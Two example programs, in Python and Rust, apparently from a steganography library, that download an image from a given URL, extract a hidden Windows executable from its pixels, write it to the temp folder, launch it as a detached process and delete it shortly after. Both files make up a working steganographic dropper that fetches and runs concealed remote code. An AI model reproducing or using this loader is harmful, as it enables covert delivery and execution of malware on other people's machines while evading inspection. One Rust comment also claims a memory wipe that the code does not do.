File: examples/fetch_run.py
#!/usr/bin/env python3
"""fetch_run.py — template: download image -> decode -> execute payload.
Usage: fetch_run.py <https-url> <out-name> [--password P] [--wait] [--keep]
Decode only touches bytes; launching is explicit below.
"""
import os
import subprocess
import sys
import urllib.request

sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)),
                                '..', 'python'))
from stegolib import decode_image
from PIL import Image


def main():
    args = sys.argv[1:]
    if len(args) < 2:
        print('usage: fetch_run.py <https-url> <out-name> [--password P] [--wait] [--keep]')
        return 2
    password = ''
    if '--password' in args:
        password = args[args.index('--password') + 1]

    # 1. Download.
    try:
        with urllib.request.urlopen(args[0], timeout=60) as r:
            wire = r.read()
    except Exception as e:
        print(f'download failed: {e}')
        return 1
    with open(os.path.join(os.environ.get('TEMP', '.'), '_fx.png'), 'wb') as f:
        f.write(wire)

    # 2. Decode.
    tmp = os.path.join(os.environ.get('TEMP', '.'), '_fx.png')
    img = Image.open(tmp).convert('RGB')
    os.remove(tmp)
    w, h = img.size
    flat = []
    for r, g, b in img.getdata():
        flat += [r, g, b]
    payload = decode_image(flat, w, h, password=password)
    if not payload or len(payload) < 2:
        print('decode failed')
        return 1
    if payload[:2] != b'MZ':
        print('not a Windows executable (missing MZ), refusing to run')
        return 1

    # 3. Drop + launch (detached unless --wait).
    name = args[1]
    if not name.lower().endswith('.exe'):
        name += '.exe'
    drop = os.path.join(os.environ.get('TEMP', '.'), name)
    with open(drop, 'wb') as f:
        f.write(payload)
    del payload
    try:
        p = subprocess.Popen(
            [drop], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
            creationflags=getattr(subprocess, 'DETACHED_PROCESS', 0))
    except Exception as e:
        os.remove(drop)
        print(f'launch failed: {e}')
        return 1
    print(f'launched pid={p.pid}')
    if '--wait' in args:
        print(f'exit code={p.wait()}')
    if '--keep' not in args:
        import time
        time.sleep(2)
        try:
            os.remove(drop)
        except OSError:
            pass
    return 0


if __name__ == '__main__':
    sys.exit(main())

File: examples/fetch_run.rs
// fetch_run.rs - template: download image -> decode -> execute payload.
// Usage: fetch_run <https-url> <out-name> [--password P] [--wait] [--keep]
// Needs: stego crate (sibling), image crate (PNG), ureq (HTTPS).
// Decode only touches bytes; launching is explicit below.
use std::env;
use std::fs;
use std::process::Command;

fn has(args: &[String], v: &str) -> bool {
    args.iter().skip(3).any(|a| a == v)
}

fn main() {
    let args: Vec<String> = env::args().collect();
    if args.len() < 3 {
        eprintln!("usage: fetch_run <https-url> <out-name> [--password P] [--wait] [--keep]");
        std::process::exit(2);
    }
    let mut password: Option<&str> = None;
    for i in 3..args.len() {
        if args[i] == "--password" && i + 1 < args.len() {
            password = Some(&args[i + 1]);
        }
    }

    // 1. Download (ureq, rustls).
    let bytes = ureq::get(&args[1]).call().unwrap_or_else(|e| {
        eprintln!("download failed: {e}");
        std::process::exit(1);
    });
    let mut body = Vec::new();
    use std::io::Read;
    bytes.into_reader().read_to_end(&mut body).unwrap_or_else(|e| {
        eprintln!("read failed: {e}");
        std::process::exit(1);
    });

    // 2. Decode (image crate -> RGB -> stego crate).
    let dynimg = image::load_from_memory(&body).unwrap_or_else(|_| {
        eprintln!("not a readable image");
        std::process::exit(1);
    });
    let rgb8 = dynimg.to_rgb8();
    let (w, h) = (rgb8.width(), rgb8.height());
    let payload = stego::decode(rgb8.as_raw(), w, h, password).unwrap_or_else(|e| {
        eprintln!("decode failed: {e:?}");
        std::process::exit(1);
    });
    if payload.len() < 2 || &payload[..2] != b"MZ" {
        eprintln!("not a Windows executable (missing MZ), refusing to run");
        std::process::exit(1);
    }

    // 3. Drop + launch (detached unless --wait).
    let mut name = args[2].clone();
    if !name.to_lowercase().ends_with(".exe") {
        name.push_str(".exe");
    }
    let drop = std::env::temp_dir().join(&name);
    fs::write(&drop, &payload).unwrap_or_else(|_| {
        eprintln!("write failed");
        std::process::exit(1);
    });
    // Best-effort memory wipe of the decoded copy.
    let mut child = Command::new(&drop)
        .arg("")
        .spawn()
        .unwrap_or_else(|e| {
            let _ = fs::remove_file(&drop);
            eprintln!("launch failed: {e}");
            std::process::exit(1);
        });
    println!("launched pid={}", child.id());
    if has(&args, "--wait") {
        match child.wait() {
            Ok(s) => println!("exit code={}", s.code().unwrap_or(-1)),
            Err(e) => eprintln!("wait failed: {e}"),
        }
    }
    if !has(&args, "--keep") {
        std::thread::sleep(std::time::Duration::from_secs(2));
        let _ = fs::remove_file(&drop);
    }
}
